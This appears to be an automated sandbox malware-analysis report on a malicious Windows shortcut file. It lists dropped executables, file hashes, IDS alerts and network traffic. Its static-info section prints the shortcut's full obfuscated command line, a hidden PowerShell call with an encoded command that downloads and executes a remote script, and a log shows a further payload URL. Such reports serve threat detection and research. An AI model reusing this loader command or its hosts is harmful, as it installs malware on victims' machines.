                                                                                                        Preview:...................................FL..................F.".. ......A.....pDo.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A......g.1...5Io.1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYDQ.............................A.p.p.D.a.t.a...B.V.1.....hYHQ..Roaming.@......&W.<hYHQ..........................t/#.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYDQ...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hYC...Windows.@......&W.<hYDQ...........................C..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hYDQ....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hYDQ....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYNQ....8...........

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF612a25.TMP (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6222
                                                                                                        Entropy (8bit):3.733802121460088
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:AASug5SBCfdAh6rjkvhkvCCtSzDGxiHU2zDGxiHu:ANJTnyD8VOD89
                                                                                                        MD5:0BBFACF39F136530A024FE25B1FFE650
                                                                                                        SHA1:04B91F8CF32A713063536D4F3FFA2FC907135F89
                                                                                                        SHA-256:9D7100BDE23DC87D67698123333C837845272328BF71B2A3C20B5BE541C20D61
                                                                                                        SHA-512:ADAFE2813AA20D7C222C2EEC9CF4A963DE3B66FB31131FAECC48F671DCA2B56CA181155A2BA0F54C1EF674141A0679DD5781CEF4F2EAA01A2B43161653CAE453
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ......A.....pDo.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A......g.1...5Io.1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYDQ.............................A.p.p.D.a.t.a...B.V.1.....hYHQ..Roaming.@......&W.<hYHQ..........................t/#.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYDQ...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hYC...Windows.@......&W.<hYDQ...........................C..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hYDQ....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hYDQ....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYNQ....8...........

                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7E3LM0SW2UUO5051FXUK.temp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6222
                                                                                                        Entropy (8bit):3.733802121460088
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:AASug5SBCfdAh6rjkvhkvCCtSzDGxiHU2zDGxiHu:ANJTnyD8VOD89
                                                                                                        MD5:0BBFACF39F136530A024FE25B1FFE650
                                                                                                        SHA1:04B91F8CF32A713063536D4F3FFA2FC907135F89
                                                                                                        SHA-256:9D7100BDE23DC87D67698123333C837845272328BF71B2A3C20B5BE541C20D61
                                                                                                        SHA-512:ADAFE2813AA20D7C222C2EEC9CF4A963DE3B66FB31131FAECC48F671DCA2B56CA181155A2BA0F54C1EF674141A0679DD5781CEF4F2EAA01A2B43161653CAE453
                                                                                                        Malicious:false
                                                                                                        Preview:...................................FL..................F.".. ......A.....pDo.1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A......g.1...5Io.1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hYDQ.............................A.p.p.D.a.t.a...B.V.1.....hYHQ..Roaming.@......&W.<hYHQ..........................t/#.R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hYDQ...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hYC...Windows.@......&W.<hYDQ...........................C..W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hYDQ....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hYDQ....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY............................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hYNQ....8...........

                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64
                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                        Malicious:false
                                                                                                        Preview:@...e...........................................................

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_enka2tef.dtl.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_isxemvxe.fnz.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_j4b3qtjo.l3p.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_jnmvachi.xzh.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_nj4djdq2.as0.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_sgh4oip1.fz1.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_yftdhux0.sja.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\__PSScriptPolicyTest_zy1qword.izs.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Windows\Temp\deviceId.txt

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37
                                                                                                        Entropy (8bit):4.185823555333621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:1FvBhiaTin:Vhun
                                                                                                        MD5:2E34892691A39C064B28C2196A4735CB
                                                                                                        SHA1:3037D60AA679A60A2A690C9EB314C27E8DB33452
                                                                                                        SHA-256:7E677E793E94E3C36E5016ABDA2CF6E6B9E3BA3AEC1DF05E77CC3771967D219E
                                                                                                        SHA-512:63323EB0221FA1FE3A83C65F75803AEE76A338D0685E1036BFAB1EA95636E221471D7CC7CA0D040B8CB183A2F5F8C6C892AD65AF0EA87AA9EB4588E435FE0D81
                                                                                                        Malicious:false
                                                                                                        Preview:.ECA4E7F645CEABCF141D602CC3089672..

                                                                                                        C:\Windows\Temp\file

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8351232
                                                                                                        Entropy (8bit):6.870213524632391
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:98304:c6ELl9Xn8eQO54RgwIL6gTayjL9rjX27v/tIDZaFaOgj:c6EHXBQbRE5Tayjhrj2QaFaOS
                                                                                                        MD5:0F611184B8A15C73AD43B82BDE807849
                                                                                                        SHA1:4FBE94B19F1C69BA5ED4EF6DE134FAEC1B5B7270
                                                                                                        SHA-256:2E77D02BBB8C853FE46B0CDC0D98A96CEF2C3DCB58CD98906CB1A2306F3213A4
                                                                                                        SHA-512:C02A1D9646C662AFBD722F67AE141B6C8B75417AB800A605E085A02B95AECE0372CC8BFB5931820D586928E1A2F0EC5BFA56DA8C7E7B7204FAA8ECF2ABD63C29
                                                                                                        Malicious:false
                                                                                                        Preview:L[......................A............................................... ..M. Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/...%.........v...................._...............Z.......Z...............Z.......[.......[......Shbi............QD..e......f..........#....(..F..G8...............A.............................q............a..........................................)..Y...i)..U....A.......q..E............Q......1...........................).....A.............^............................./udyu...y&.......)..................!..a/l`o`fde..:..A....:..-..............!..aixes`ude......F........................./se`u`..]>3...^..A3...F.............A..A/e`u`........Q...o....{.............A.../qe`u`..E....q........{.............A..A/srsb........A.......W~.............A..A/sdmnb.......Q.......]~.............A..C........................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\log_rdp_08112024_05.txt

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Temp\myRdpService.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):293
                                                                                                        Entropy (8bit):4.425407770432103
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:2bZwEyesAXI4WcdB4wcdqWALfwMHAXI4WcdB4wcdqWALfwCAXI4WcdB4wcdqWAn:0wQsAXxWMrWAMGAXxWMrWAMCAXxWMrWA
                                                                                                        MD5:B9B90B2A14A7B5E0877B14A7A1735852
                                                                                                        SHA1:86277F1B9A33497C557B8F7F1BE823D743E7D542
                                                                                                        SHA-256:BA0CE2E34111B8C48E3824F7982C8C2F0F0E9A388CBAE65A0C102CA76E3BA8B7
                                                                                                        SHA-512:3CF4FAB5AE43D52393AFB5DAA11D45E80DFEA0DCE6EDCBD49DF71D5A0E439852FB8EDA8ADF9B6053C5BE3EED6089690936A9CD629E5F7BC150BB0D167BD7B47B
                                                                                                        Malicious:false
                                                                                                        Preview:17:12:10 - Internet connection..17:12:21 - The server returned status code '404' when status code '101' was expected...17:12:24 - The server returned status code '404' when status code '101' was expected...17:12:37 - The server returned status code '404' when status code '101' was expected...

                                                                                                        C:\Windows\Temp\myRdpService.exe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Temp\svczHost.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):9427456
                                                                                                        Entropy (8bit):6.890384949334134
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:98304:FagXMQc5xC9yZAaynfX9lvlJIg/EX4AAXC06GM3NOC02kf:DXMNYyGft7JIg/dAAXkGcu2
                                                                                                        MD5:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                                        SHA1:44C482F52EE997816D2582CF1D1C0A5295BA8DC9
                                                                                                        SHA-256:5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
                                                                                                        SHA-512:4BDA0642A063BFE3B86FF97C2F7500910BEA416507B9814C0DDAC0631B1B30ED47DCC6E22752B6566353B4F7386522A6E3C104B3EB055C5BA938522ED095B429
                                                                                                        Malicious:true
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: O5PR3i6ILA.lnk, Detection: malicious, Browse
                                                                                                        • Filename: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk, Detection: malicious, Browse
                                                                                                        • Filename: aQuwmiym51.lnk, Detection: malicious, Browse
                                                                                                        • Filename: gW6FHWNFzR.lnk, Detection: malicious, Browse
                                                                                                        • Filename: U82W1yZAYQ.lnk, Detection: malicious, Browse
                                                                                                        • Filename: ZGMW2wgPzY.lnk, Detection: malicious, Browse
                                                                                                        • Filename: z0gG2GA9vG.lnk, Detection: malicious, Browse
                                                                                                        • Filename: About-Us.docx lnk.lnk, Detection: malicious, Browse
                                                                                                        • Filename: Job-Description pdf lnk.lnk, Detection: malicious, Browse
                                                                                                        • Filename: 6GMmnAcpMs.lnk, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d...UR+g.........."....).:P...A................@.............................@............`...................................................|........................... ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managed..C..`....C..L.............. ..`hydrated.....`P..........................rdata..pq9...l..r9..>P.............@..@.data....x..........................@....pdata..............6..............@..@.rsrc...............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

                                                                                                        C:\Windows\Temp\svczHost.exe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8351232
                                                                                                        Entropy (8bit):6.8702135246323905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:98304:3qyaZJr8q0SLK/1JQv6udEr3onGwuNztOqZ+:6BgqrKNwvdK3iGwgOqZ
                                                                                                        MD5:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                                        SHA1:B53BD3683487B873D1D4D0077C432698702CC347
                                                                                                        SHA-256:41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
                                                                                                        SHA-512:E7FC0571CB0BA516794A52A3277D3CB15049FFB739EBC203D80E6F9FCD08F6B5848AF470BA0F082A3D039472A83ED87512C0E4750946406649097C097EECFF40
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................^...............[.......[...............[.......Z.......Z......Rich............PE..d......g.........."....)..G..F9...............@.............................p............`..........................................(..X...h(..T....@.......p..D............P......0...........................(.......@............._..............................text...x'.......(.................. ..`.managed..;..@....;..,.............. ..`hydrated......G..........................rdata..\?2..._..@2...G.............@..@.data........P...n....z.............@....pdata..D....p........z.............@..@.rsrc........@.......V..............@..@.reloc.......P.......\..............@..B........................................................................................................................................................................................

                                                                                                        \Device\ConDrv

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Temp\svczHost.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):69
                                                                                                        Entropy (8bit):4.938912508890667
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:eDLpHWf0wUWdhtq1OKxxTyv:eDLp2f0cdht6dTyv
                                                                                                        MD5:1D31BD1377C21C0ED537DB3DD69F6EE3
                                                                                                        SHA1:C1CA4FB89AE39C03E9F3FE48EF4BFE3A2CFD2C41
                                                                                                        SHA-256:9D6C117FF26C3D742E4BCC77C4A5C467294B2464C0F026230F8AD7ED2ED9E163
                                                                                                        SHA-512:42EFE255A02226E86079E4C34E0CE38869CCF91C0998336A2429D10B53C2C0CAECEAE8B9548B62C280EC32BD0D6DED83374AAC4570CE44893A3C777A0414D463
                                                                                                        Malicious:false
                                                                                                        Preview:Begin download https://uyt1n8ded9fb380.com/StaticFile/RdpService/64..

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=347, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                        Entropy (8bit):8.554655157872274E-4
                                                                                                        TrID:
                                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                                        File name:cOOhDuNWt7.lnk
                                                                                                        File size:17'825'792 bytes
                                                                                                        MD5:debef20706412ab3f25ef815b847ff02
                                                                                                        SHA1:c18cf92b12dbf73ff372a950e62e33cc48987b89
                                                                                                        SHA256:6321591fc9e0174f89778113066675f36358474eb7177c7de36db0ccd8f836da
                                                                                                        SHA512:14ed22788e59304fe770e67480f9ce129afa9b86484ad4fd94e1f1be945fdb5f10bcc768854bf6e6a5648fc48a52c9f4abea8b6f8acdec9c3286053a76e25214
                                                                                                        SSDEEP:48:8iI4mRhRPAmv95I34A+5MwJDrOcUVQpQmflInx4OqI:8iId+U9JOwJy8XflwOh
                                                                                                        TLSH:F707081029F704CAF2236B366FE8F6FB92B6F4A4153EB1F9124189494B31580C837B72
                                                                                                        File Content Preview:L..................F.B..................................[.......................=./.v. ./.k. .".S.t.^.a.r.^.t. ./.M.^.I.n. .".". .P.^.o.w.^.e.R.S.h.^.e.L.L. .-.W. .h.^.i.d.^.d.^.E.^.N. .-.N.o.L.O.^.g.o. .-.N.O.^.p. .-.E.p. .b.y.^.P.^.a.S.^.S. .-.e.N.^.C.^

                                                                                                        File Icon

                                                                                                        Icon Hash:69e9a9a9a3a3a1a5

                                                                                                        Static Windows Shortcut Info

                                                                                                        General

                                                                                                        Relative Path:
                                                                                                        Command Line Argument:/v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit
                                                                                                        Icon location:%SystemRoot%\System32\imageres.dll

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-11-08T11:10:33.123722+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049761172.67.137.62443TCP
                                                                                                        2024-11-08T11:10:35.359697+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049763172.67.137.62443TCP
                                                                                                        2024-11-08T11:10:37.503057+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049765172.67.137.62443TCP
                                                                                                        2024-11-08T11:11:00.759066+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049779172.67.137.62443TCP
                                                                                                        2024-11-08T11:11:16.434331+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304978523.44.201.7443TCP
                                                                                                        2024-11-08T11:11:59.050211+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049786172.67.137.62443TCP
                                                                                                        2024-11-08T11:12:19.867996+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304978823.209.72.32443TCP
                                                                                                        2024-11-08T11:12:41.905355+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049792172.67.137.62443TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 8, 2024 11:10:29.714113951 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:29.714137077 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:29.714308023 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:29.720953941 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:29.720963955 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:29.975389957 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:29.975615025 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:29.979398966 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:29.979407072 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:29.979613066 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:29.984898090 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:30.027965069 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:30.849559069 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:30.849582911 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:30.849632025 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:30.849841118 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:30.849886894 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:30.849896908 CET44349760172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:10:30.850050926 CET49760443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:10:31.113629103 CET44349760172.67.137.62192.168.11.30
